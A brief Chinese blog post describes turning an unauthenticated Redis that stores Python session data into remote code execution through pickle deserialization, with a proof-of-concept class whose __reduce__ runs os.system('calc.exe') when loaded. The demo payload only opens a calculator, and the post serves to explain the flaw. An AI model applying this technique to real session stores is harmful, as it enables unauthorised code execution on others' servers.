python反序列化利用

Posted by bfpiaoran on April 11, 2019

今天无意看到的场景  redis未授权访问但被降权,redis用于存储用户session,后端python    序列化读取session

先来一张Pickle  序列化得样子

然后写进去 当访问session  python会反序列化造成rce

这里写个测试例子

s为payload

 

import pickle
import os

class exp(object):
	def __reduce__(self):
		s = "calc.exe"
		return (os.system,(s,))

e = exp()
s = pickle.dumps(e)

with open("rce","wb") as f:
	f.write(s)


with open("rce","rb") as e:
    data = pickle.loads(e.read())
    print(data)